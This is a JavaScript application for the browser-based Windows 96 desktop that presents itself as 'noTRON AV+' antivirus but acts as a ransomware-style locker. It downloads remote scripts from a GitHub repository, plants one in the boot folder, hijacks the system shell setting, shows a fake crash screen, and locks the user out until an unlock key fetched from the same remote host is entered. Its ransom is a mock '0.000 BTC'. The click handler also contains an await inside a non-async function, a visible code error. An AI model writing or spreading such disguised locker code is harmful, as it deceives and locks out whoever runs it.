//!wrt $BSPEC:{"icn":"apps/notron","cpr":"Upgraded noTRON AV!!!","dsc":"noTRON AV+"}
const fs = w96.FS;
const { Theme } = w96.ui;
const { sysConf: SCM } = w96;

class GUIApplication extends WApplication {
    /**
     * Application constructor.
     */
    constructor() {
        super();
    }
    
    /**
     * Main entry point.
     * @param {String[]} argv The program arguments.
     */
    async main(argv) {
        super.main(argv);
        let a = await fs.exists("c:/user/appdata/z.wrt")
        if(a){
        const mainwnd = this.createWindow({
            title: "noTRON AV+",
            body: "You have been locked out of your system by the noTRON AV rogue.<br>Please enter the unlock key in order to go back to normal.<br>You can purchase one for 0.000 BTC at https://github.com/TermOfficial/plus.<br>The key.txt file will give you instructions.<br><input type=\"text\" id=\"key\" placeholder=\"Key\"></input><button id=\"unlock\">I hope you have internet access...</button>",
            bodyClass: "sample-app",
            taskbar: false,
            resizable: false,
            initialHeight: 450,
            initialWidth: 350,
            icon: await Theme.getIconUrl("apps/notron", '16x16')
        }, true);
        mainwnd.show();
        var body = mainwnd.getBodyContainer();
        body.getElementById("unlock").addEventListener("click", function(){
            let response = await fetch('https://raw.githubusercontent.com/TermOfficial/plus/main/key.txt').then(r => r.text());
            if(body.getElementById("key").value == response){
                alert("Thank you for your payment!");
                SCM.set("System/Session/Shell/exec", "default");
                await SCM.syncRoot("System");
                await fs.rm("c:/system/boot/notron.js");
                await fs.rm("c:/user/appdata/y.wrt");
                await fs.rm("c:/user/appdata/z.wrt");
            } else {
                alert("Incorrect key! Or do you not have internet? Make sure you can access the raw.githubusercontent.com domain.");
            }
        }, true);
        } else {
            const mainwnd = this.createWindow({
            title: "noTRON AV+",
            body: "Installing noTRON AV+",
            bodyClass: "sample-app",
            taskbar: false,
            resizable: false,
            initialHeight: 100,
            initialWidth: 250,
            icon: await Theme.getIconUrl("apps/notron", '16x16')
        }, true);
        mainwnd.show();
            let response = await fetch('https://raw.githubusercontent.com/TermOfficial/plus/main/hehe.js').then(r => r.text());
            await fs.writestr("c:/system/boot/notron.js", response);
            response = await fetch('https://raw.githubusercontent.com/TermOfficial/plus/main/breakdown').then(r => r.text());
            await fs.writestr("c:/user/appdata/z.wrt", response);
            await fs.mvfile("c:/user/desktop/notronplus.wrt", "c:/user/appdata/y.wrt");
            SCM.set("System/Session/Shell/exec", "c:/user/appdata/z.wrt");
            await SCM.syncRoot("System");
            w96.sys.renderBSOD("Failed to render window");
        }
    }
}

return await WApplication.execAsync(new GUIApplication(), this.boxedEnv.args);
